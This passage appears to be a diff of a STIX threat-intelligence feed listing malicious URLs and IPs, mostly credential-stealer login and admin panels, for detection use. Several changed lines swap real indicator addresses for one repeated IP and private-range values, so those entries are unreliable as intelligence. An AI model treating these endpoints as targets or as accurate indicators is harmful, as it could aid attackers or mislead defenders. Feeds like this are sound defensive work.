CyberCrime","id":"indicator--5a563c85-c528-4e33-babe-2dcff34f73c4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-01-22T03:00:03.138Z","name":"mal_url: http://nkpotu.xyz/Kpot2/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nkpotu.xyz/Kpot2/login.php']","type":"indicator","valid_from":"2020-01-22T03:00:03.138Z"} @@ -23,14 +23,14 @@ {"created":"2020-01-22T03:00:45.787Z","description":"TS ID: 55241332309; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--aff7b07f-acc7-4bec-ab19-1fce972bfd09","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-01-22T03:00:45.787Z","name":"mal_url: http://worldatdoor.in/panel2/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://worldatdoor.in/panel2/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T03:00:45.787Z"} {"created":"2020-01-22T03:00:45.841Z","description":"TS ID: 55241332286; iType: mal_url; State: active; Org: Garanntor-Hosting; Source: CyberCrime","id":"indicator--ba71ba3a-1efd-40da-ab0d-f4397d6fc337","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-01-22T03:00:45.841Z","name":"mal_url: http://smartlinktelecom.top/kings/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://smartlinktelecom.top/kings/panel/admin.php']","type":"indicator","valid_from":"2020-01-22T03:00:45.841Z"} {"created":"2020-01-22T03:00:45.959Z","description":"TS ID: 55241332339; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--17777e7f-3e91-4446-a43d-79139de8a948","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-64"],"modified":"2020-01-22T03:00:45.959Z","name":"mal_url: http://carirero.net/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://carirero.net/login.php']","type":"indicator","valid_from":"2020-01-22T03:00:45.959Z"} -{"created":"2020-01-22T03:00:46.025Z","description":"TS ID: 55241332319; iType: mal_ip; State: active; Org: SoftLayer Technologies; Source: CyberCrime","id":"indicator--f6be1804-cfe4-4f41-9338-2b65f5b1dda1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-30"],"modified":"2020-01-22T03:00:46.025Z","name":"mal_ip: 74.116.84.20","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '74.116.84.20']","type":"indicator","valid_from":"2020-01-22T03:00:46.025Z"} +{"created":"2020-01-22T03:00:46.025Z","description":"TS ID: 55241332319; iType: mal_ip; State: active; Org: SoftLayer Technologies; Source: CyberCrime","id":"indicator--f6be1804-cfe4-4f41-9338-2b65f5b1dda1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-30"],"modified":"2020-01-22T03:00:46.025Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-22T03:00:46.025Z"} {"created":"2020-01-22T03:00:57.729Z","description":"TS ID: 55241332305; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--b4fd8489-9589-4f70-996c-84989245a21b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-43"],"modified":"2020-01-22T03:00:57.729Z","name":"mal_url: http://tuu.nu/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://tuu.nu/login']","type":"indicator","valid_from":"2020-01-22T03:00:57.729Z"} {"created":"2020-01-22T03:01:02.696Z","description":"TS ID: 55241332346; iType: mal_url; State: active; Org: Ifx Networks Colombia; Source: CyberCrime","id":"indicator--bc50c62f-a015-4460-87df-2137626877e3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-36"],"modified":"2020-01-22T03:01:02.696Z","name":"mal_url: http://dulfix.com/cgi-bins/dulfix/gustav57/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://dulfix.com/cgi-bins/dulfix/gustav57/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T03:01:02.696Z"} {"created":"2020-01-22T03:01:02.807Z","description":"TS ID: 55241332323; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--2765af4b-bfb7-4ac8-82d2-ab6ed8a52461","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-65"],"modified":"2020-01-22T03:01:02.807Z","name":"mal_url: http://deliciasdvally.com.pe/includes/gter/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://deliciasdvally.com.pe/includes/gter/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T03:01:02.807Z"} {"created":"2020-01-22T03:01:24.81Z","description":"TS ID: 55241332399; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--9c0e63a1-c32a-470a-bf09-51488e239c63","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-01-22T03:01:24.81Z","name":"mal_url: http://nkpotu.xyz/Kpot1/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nkpotu.xyz/Kpot1/login.php']","type":"indicator","valid_from":"2020-01-22T03:01:24.81Z"} -{"created":"2020-01-22T03:01:41.158Z","description":"TS ID: 55241332328; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime","id":"indicator--8047678e-20be-4116-9bc4-7bb7c26554e0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-22T03:01:41.158Z","name":"mal_ip: 194.87.147.80","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '194.87.147.80']","type":"indicator","valid_from":"2020-01-22T03:01:41.158Z"} +{"created":"2020-01-22T03:01:41.158Z","description":"TS ID: 55241332328; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime","id":"indicator--8047678e-20be-4116-9bc4-7bb7c26554e0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-22T03:01:41.158Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-22T03:01:41.158Z"} {"created":"2020-01-22T03:01:57.189Z","description":"TS ID: 55241332377; iType: mal_url; State: active; Org: A100 ROW GmbH; Source: CyberCrime","id":"indicator--c57a880c-1ce0-45de-9bab-fb2910454a61","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-01-22T03:01:57.189Z","name":"mal_url: http://35.158.92.3/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://35.158.92.3/panel/admin.php']","type":"indicator","valid_from":"2020-01-22T03:01:57.189Z"} -{"created":"2020-01-22T03:01:57.279Z","description":"TS ID: 55241332101; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--6056152c-0fa5-4e34-871a-3c8990f1ee46","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-42"],"modified":"2020-01-22T03:01:57.279Z","name":"mal_ip: 45.95.168.70","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '45.95.168.70']","type":"indicator","valid_from":"2020-01-22T03:01:57.279Z"} +{"created":"2020-01-22T03:01:57.279Z","description":"TS ID: 55241332101; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--6056152c-0fa5-4e34-871a-3c8990f1ee46","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-42"],"modified":"2020-01-22T03:01:57.279Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-22T03:01:57.279Z"} {"created":"2020-01-22T03:02:50.57Z","description":"TS ID: 55241332357; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--23215acb-4989-4434-ac6d-8f9367734f0f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-22T03:02:50.57Z","name":"mal_url: http://chol.cc/Work7/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://chol.cc/Work7/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T03:02:50.57Z"} {"created":"2020-01-22T03:02:52.496Z","description":"TS ID: 55241332289; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--452ece92-9ff2-4f99-8a7f-fd614ebea8cf","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-26"],"modified":"2020-01-22T03:02:52.496Z","name":"mal_url: http://f0391600.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0391600.xsph.ru/login']","type":"indicator","valid_from":"2020-01-22T03:02:52.496Z"} {"created":"2020-01-22T03:03:42.819Z","description":"TS ID: 55241332334; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--10958d74-ec60-41af-a1ab-1613257e670f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-01-22T03:03:42.819Z","name":"mal_url: http://extraclick.space/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://extraclick.space/login.php']","type":"indicator","valid_from":"2020-01-22T03:03:42.819Z"} @@ -39,38 +39,38 @@ {"created":"2020-01-22T03:04:32.717Z","description":"TS ID: 55241332341; iType: mal_url; State: active; Org: Institute of Philosophy, Russian Academy of Scienc; Source: CyberCrime","id":"indicator--43febf7d-4185-4a12-a868-e7be690b14aa","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-01-22T03:04:32.717Z","name":"mal_url: http://zanlma.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://zanlma.com/login']","type":"indicator","valid_from":"2020-01-22T03:04:32.717Z"} {"created":"2020-01-22T03:04:56.858Z","description":"TS ID: 55241332303; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--a34728e6-f91d-47e6-a4d8-a69176299e45","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-01-22T03:04:56.858Z","name":"mal_url: http://f0369688.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0369688.xsph.ru/login']","type":"indicator","valid_from":"2020-01-22T03:04:56.858Z"} {"created":"2020-01-22T03:04:59.245Z","description":"TS ID: 55241332380; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--ac821704-5eb2-4f8f-a8b6-2a168dbd0e54","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-22T03:04:59.245Z","name":"mal_url: http://chol.cc/Work2/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://chol.cc/Work2/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T03:04:59.245Z"} -{"created":"2020-01-23T03:00:22.287Z","description":"TS ID: 55245868747; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--0d3e1bd8-0f16-4c22-b8a1-663ec255ad79","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-57"],"modified":"2020-01-23T03:00:22.287Z","name":"mal_ip: 192.185.214.199","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '192.185.214.199']","type":"indicator","valid_from":"2020-01-23T03:00:22.287Z"} +{"created":"2020-01-23T03:00:22.287Z","description":"TS ID: 55245868747; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--0d3e1bd8-0f16-4c22-b8a1-663ec255ad79","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-57"],"modified":"2020-01-23T03:00:22.287Z","name":"mal_ip: 192.168.214.199","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '192.168.214.199']","type":"indicator","valid_from":"2020-01-23T03:00:22.287Z"} {"created":"2020-01-23T03:01:11.329Z","description":"TS ID: 55245868770; iType: mal_url; State: active; Org: Mills College; Source: CyberCrime","id":"indicator--2cdd130a-c884-402d-b63c-e03f9448f5d9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-24"],"modified":"2020-01-23T03:01:11.329Z","name":"mal_url: http://softtouchcollars.com/Loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://softtouchcollars.com/Loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-23T03:01:11.329Z"} {"created":"2020-01-23T03:01:36.682Z","description":"TS ID: 55245868769; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--88e98e13-4bfd-4188-941a-f696a7b86b71","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-61"],"modified":"2020-01-23T03:01:36.682Z","name":"mal_url: http://imobiliariatirol.com/gh/panelnew/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://imobiliariatirol.com/gh/panelnew/admin.php']","type":"indicator","valid_from":"2020-01-23T03:01:36.682Z"} {"created":"2020-01-23T03:02:15.854Z","description":"TS ID: 55245868772; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--27323b7d-85d3-4e89-8249-b7696925a772","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-01-23T03:02:15.854Z","name":"mal_url: http://deliveryexpressworld.xyz/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://deliveryexpressworld.xyz/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-23T03:02:15.854Z"} {"created":"2020-01-23T03:02:47.364Z","description":"TS ID: 55245868766; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--b0639721-de55-48c6-b237-3859d61aecfb","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-62"],"modified":"2020-01-23T03:02:47.364Z","name":"mal_url: http://f0392261.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0392261.xsph.ru/login']","type":"indicator","valid_from":"2020-01-23T03:02:47.364Z"} -{"created":"2020-01-23T03:03:05.048Z","description":"TS ID: 55245868749; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--677e714d-c237-42a1-b6b7-9145acd13eee","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-80"],"modified":"2020-01-23T03:03:05.048Z","name":"mal_url: http://104.168.99.168/panel/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://104.168.99.168/panel/panel/admin.php']","type":"indicator","valid_from":"2020-01-23T03:03:05.048Z"} +{"created":"2020-01-23T03:03:05.048Z","description":"TS ID: 55245868749; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--677e714d-c237-42a1-b6b7-9145acd13eee","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-80"],"modified":"2020-01-23T03:03:05.048Z","name":"mal_url: http://89.160.20.156/panel/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/panel/panel/admin.php']","type":"indicator","valid_from":"2020-01-23T03:03:05.048Z"} {"created":"2020-01-23T03:03:15.734Z","description":"TS ID: 55245868767; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--5baa1dbd-d74e-408c-92b5-0a9f97e4b87a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-69"],"modified":"2020-01-23T03:03:15.734Z","name":"mal_url: http://f0387404.xsph.ru/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0387404.xsph.ru/panel/admin.php']","type":"indicator","valid_from":"2020-01-23T03:03:15.734Z"} {"created":"2020-01-23T03:03:42.599Z","description":"TS ID: 55245868768; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--4563241e-5d2f-41a7-adb9-3925a5eeb1b1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-01-23T03:03:42.599Z","name":"mal_url: http://a0386457.xsph.ru/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://a0386457.xsph.ru/panel/admin.php']","type":"indicator","valid_from":"2020-01-23T03:03:42.599Z"} {"created":"2020-01-24T02:57:04.821Z","description":"TS ID: 55250078037; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--70cb5d42-91d3-4efe-8c47-995fc0ac4141","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-01-24T02:57:04.821Z","name":"mal_url: http://defenseisrael.com/dis/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://defenseisrael.com/dis/index.php']","type":"indicator","valid_from":"2020-01-24T02:57:04.821Z"} -{"created":"2020-01-24T02:57:04.857Z","description":"TS ID: 55250078030; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime","id":"indicator--3aa712bb-b5d4-4632-bf50-48a4aeeaeb6d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-24T02:57:04.857Z","name":"mal_ip: 91.215.170.249","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '91.215.170.249']","type":"indicator","valid_from":"2020-01-24T02:57:04.857Z"} +{"created":"2020-01-24T02:57:04.857Z","description":"TS ID: 55250078030; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime","id":"indicator--3aa712bb-b5d4-4632-bf50-48a4aeeaeb6d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-24T02:57:04.857Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-24T02:57:04.857Z"} {"created":"2020-01-24T02:57:04.883Z","description":"TS ID: 55250078019; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--64227c7d-86ea-4146-a868-3decb5aa5f1d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-01-24T02:57:04.883Z","name":"mal_url: http://lbfb3f03.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://lbfb3f03.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-01-24T02:57:04.883Z"} {"created":"2020-01-24T02:57:12.997Z","description":"TS ID: 55250078035; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--37fcf9a7-1a90-4d81-be0a-e824a4fa938e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-01-24T02:57:12.997Z","name":"mal_url: http://byedtronchgroup.yt/jik/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://byedtronchgroup.yt/jik/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-24T02:57:12.997Z"} -{"created":"2020-01-24T02:57:13.025Z","description":"TS ID: 55250078008; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--5a38786f-107e-4060-a7c9-ea8a5ded6aac","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-24T02:57:13.025Z","name":"mal_url: http://199.192.28.11/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://199.192.28.11/panel/admin.php']","type":"indicator","valid_from":"2020-01-24T02:57:13.025Z"} -{"created":"2020-01-24T02:57:32.901Z","description":"TS ID: 55250078038; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--3eb79b31-1d6d-438c-a848-24a3407f6e32","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-24T02:57:32.901Z","name":"mal_url: http://217.8.117.51/aW8bVds1/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://217.8.117.51/aW8bVds1/login.php']","type":"indicator","valid_from":"2020-01-24T02:57:32.901Z"} +{"created":"2020-01-24T02:57:13.025Z","description":"TS ID: 55250078008; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--5a38786f-107e-4060-a7c9-ea8a5ded6aac","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-24T02:57:13.025Z","name":"mal_url: http://199.192.168.11/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://199.192.168.11/panel/admin.php']","type":"indicator","valid_from":"2020-01-24T02:57:13.025Z"} +{"created":"2020-01-24T02:57:32.901Z","description":"TS ID: 55250078038; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--3eb79b31-1d6d-438c-a848-24a3407f6e32","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-24T02:57:32.901Z","name":"mal_url: http://89.160.20.156/aW8bVds1/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/aW8bVds1/login.php']","type":"indicator","valid_from":"2020-01-24T02:57:32.901Z"} {"created":"2020-01-24T02:57:32.929Z","description":"TS ID: 55250078026; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--a050832c-db6e-49a0-8470-7a3cd8f17178","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-01-24T02:57:32.929Z","name":"mal_url: http://lansome.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://lansome.site/login']","type":"indicator","valid_from":"2020-01-24T02:57:32.929Z"} {"created":"2020-01-24T02:57:49.028Z","description":"TS ID: 55250078034; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime","id":"indicator--e88008f4-76fc-428d-831a-4b389e48b712","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-24T02:57:49.028Z","name":"mal_url: http://iplusvietnam.com.vn/jo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://iplusvietnam.com.vn/jo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-24T02:57:49.028Z"} {"created":"2020-01-24T02:58:03.345Z","description":"TS ID: 55250078032; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--dafe91cf-787c-471c-9afe-f7bb20a1b93f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-01-24T02:58:03.345Z","name":"mal_url: http://leakaryadeen.com/parl/id345/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://leakaryadeen.com/parl/id345/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-24T02:58:03.345Z"} {"created":"2020-01-24T02:58:16.318Z","description":"TS ID: 55250078031; iType: mal_url; State: active; Org: IT House, Ltd; Source: CyberCrime","id":"indicator--232bdc34-44cb-4f41-af52-f6f1cd28818e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-01-24T02:58:16.318Z","name":"mal_url: http://oaa-my.com/clap/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://oaa-my.com/clap/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-24T02:58:16.318Z"} {"created":"2020-01-24T02:58:16.358Z","description":"TS ID: 55250078027; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime","id":"indicator--4adabe80-3be4-401a-948a-f9724c872374","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-66"],"modified":"2020-01-24T02:58:16.358Z","name":"mal_url: http://thaubenuocngam.com/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://thaubenuocngam.com/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-24T02:58:16.358Z"} {"created":"2020-01-24T02:58:32.126Z","description":"TS ID: 55250078013; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--1d7051c0-a42b-4801-bd7f-f0abf2cc125c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-24T02:58:32.126Z","name":"mal_url: http://suspiciousactivity.xyz/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://suspiciousactivity.xyz/login']","type":"indicator","valid_from":"2020-01-24T02:58:32.126Z"} -{"created":"2020-01-24T02:58:37.603Z","description":"TS ID: 55250078017; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--fb06856c-8aad-4fae-92fc-b73aae4f6dc7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-24T02:58:37.603Z","name":"mal_url: http://217.8.117.8/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://217.8.117.8/login']","type":"indicator","valid_from":"2020-01-24T02:58:37.603Z"} +{"created":"2020-01-24T02:58:37.603Z","description":"TS ID: 55250078017; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--fb06856c-8aad-4fae-92fc-b73aae4f6dc7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-24T02:58:37.603Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-01-24T02:58:37.603Z"} {"created":"2020-01-24T02:58:37.643Z","description":"TS ID: 55250078012; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--33e674f5-a64a-48f4-9d8c-248348356135","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-01-24T02:58:37.643Z","name":"mal_url: http://f0387550.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0387550.xsph.ru/login']","type":"indicator","valid_from":"2020-01-24T02:58:37.643Z"} {"created":"2020-01-24T02:58:39.465Z","description":"TS ID: 55250078018; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--6311f539-1d5d-423f-a238-d0c1dc167432","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-01-24T02:58:39.465Z","name":"mal_url: 